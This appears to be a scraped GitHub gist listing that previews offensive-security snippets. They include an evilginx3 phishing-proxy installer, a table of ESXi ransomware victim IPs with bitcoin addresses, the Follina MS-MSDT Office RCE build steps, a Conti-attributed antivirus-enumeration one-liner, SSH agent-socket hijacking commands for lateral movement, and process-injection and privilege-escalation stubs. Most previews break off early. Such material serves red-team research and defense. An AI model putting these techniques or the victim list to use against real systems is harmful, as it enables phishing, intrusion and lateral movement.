Skip to content

Instantly share code, notes, and snippets.

View dave5623's full-sized avatar

dave5623

30 followers · 47 following
View GitHub Profile
@dunderhay
dunderhay / install_evilginx3.sh
Last active March 8, 2025 16:36
bash script to install evilginx3 on a ubuntu linux host
#!/bin/bash
set -e
GO_VERSION="1.22.3"
GO_URL="https://go.dev/dl/go${GO_VERSION}.linux-amd64.tar.gz"
EXPECTED_CHECKSUM="8920ea521bad8f6b7bc377b4824982e011c19af27df88a815e3586ea895f1b36"
# Log output of script
exec > >(tee -i /home/ubuntu/install.log)
exec 2>&1
@cablej
cablej / esxi_victims.csv
Last active June 9, 2023 02:42
A list of ESXi victims Censys, published by Ransomwhere
We can make this file beautiful and searchable if this error is corrected: It looks like row 10 should actually have 8 columns, instead of 1 in line 9.
ip,address,city,country,country_code,port,dns_names,reverse_dns
78.46.39.83,1HTZ1dKiwWQKBHT3QaAkypPBngaK4z76PB,,Germany,DE,443,[],[esxi]
78.46.86.170,16oEskLDvAKHa7u6PASJUijCsRgjMFD3Ff,,Germany,DE,443,[lara.smart1.eu],[lara.smart1.eu]
78.46.72.169,1HjigJrc711d2rYy8PM9GHJua3pqUxUYT9,,Germany,DE,443,[static.169.72.46.78.clients.your-server.de],[static.169.72.46.78.clients.your-server.de]
78.46.98.70,143vqvLtDycqCmW23AsyU6oKyLytFAaB35,,Germany,DE,443,[static.70.98.46.78.clients.your-server.de],[static.70.98.46.78.clients.your-server.de]
85.10.198.152,18QSLRfwjWvMh9Ku3kqr5C7iJeVJ5FQTWc,,Germany,DE,443,[static.85-10-198-152.clients.your-server.de],[static.85-10-198-152.clients.your-server.de]
94.130.207.75,17TFafGeez1P7LgijJd26UiNhNowqCTc2w,,Germany,DE,443,[static.75.207.130.94.clients.your-server.de],[static.75.207.130.94.clients.your-server.de]
151.106.27.166,1P77MF86DxttG9H1CLcrWWkZvU2rnzv6Ev,Strasbourg,France,FR,443,[],[]
151.106.11.74,1HnKjzbLHjqjVG6KLNR43EsQeoSTtHdcAw,Strasbourg,France,FR,443,[],[]
188.40.87
@antonioCoco
antonioCoco / TcbElevation.cpp
Last active October 11, 2024 20:15
// TcbElevation - Authors: @splinter_code and @decoder_it
#define SECURITY_WIN32
#include <windows.h>
#include <sspi.h>
#include <stdio.h>
#pragma comment(lib, "Secur32.lib")
void EnableTcbPrivilege(BOOL enforceCheck);
@tothi
tothi / ms-msdt.MD
Last active February 7, 2025 12:01
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
@bandrel
bandrel / CrowdStrikeFalcon_check.py
Created February 3, 2022 15:53
#!/usr/bin/env python3
import os
import caracara
import sys
hosts = caracara.HostsToolbox(key=os.environ["FALCON_CLIENT_ID"],secret=os.environ["FALCON_CLIENT_SECRET"],verbose=True)
with open(sys.argv[1]) as doc:
for _hostname in doc.readlines():
target_aid = hosts.host.find_host_aid(hostname=_hostname.strip())
@mttaggart
mttaggart / make-lnk.ps1
Last active September 23, 2023 20:15
make-lnk.ps1
param ( [string]$SourceExe, [string]$DestinationPath, [string]$IconPath)
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut($DestinationPath)
$Shortcut.RelativePath = "..\..\..\..\..\..\..\..\..\$SourceExe"
$Shortcut.IconLocation = $IconPath
$Shortcut.TargetPath = $SourceExe
$Shortcut.Save()
@MHaggis
MHaggis / conti.cna
Created August 9, 2021 14:15
#AntiVirus Query
#Author: @r3dQu1nn
#Queries the Registry for AV installed
#Thanks to @i_am_excite and @merrillmatt011 for the help
#Props to @zerosum0x0 for the wmic find!
#Long ass one-liner :)
$powershellcmd = "\$av_list = @(\"BitDefender\", \"Kaspersky\", \"McAfee\", \"Norton\", \"Avast\", \"WebRoot\", \"AVG\", \"ESET\", \"Malware\", \"Windows Defender\");\$av_install = Get-ItemProperty HKLM:\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\*;\$av_install1 = Get-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\*;\$regkey = 'HKLM:\\SOFTWARE\\Microsoft\\Windows Defender\\Signature Updates\\';\$av_loop2 = foreach (\$av1 in \$av_list){foreach (\$key in \$av_install){if (\$key.DisplayName -match \$av1 -eq \$TRUE){% {\"{0}|{1}|{2}\" -f \$key.DisplayName.ToString(), \$key.DisplayVersion.ToString(), \$key.InstallDate.ToString()}}}};\$proc_temp = Get-Process;\$av_loop = foreach (\$av in \$av_list){foreach (\$zz in \$proc_temp){if (\$zz.path -match \$av -eq \$TRUE)
@gladiatx0r
gladiatx0r / Workstation-Takeover.md
Last active January 2, 2025 00:23
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@int0x80
int0x80 / SSH Agent Forwarding.md
Created January 7, 2021 00:59

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh [email protected]

user@internal:~$ hostname -f
internal.company.tld
@rvrsh3ll
rvrsh3ll / DInjectQueuerAPC.cs
Created November 20, 2020 15:10 — forked from jfmaes/DInjectQueuerAPC.cs
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
namespace DinjectorWithQUserAPC
{
public class Program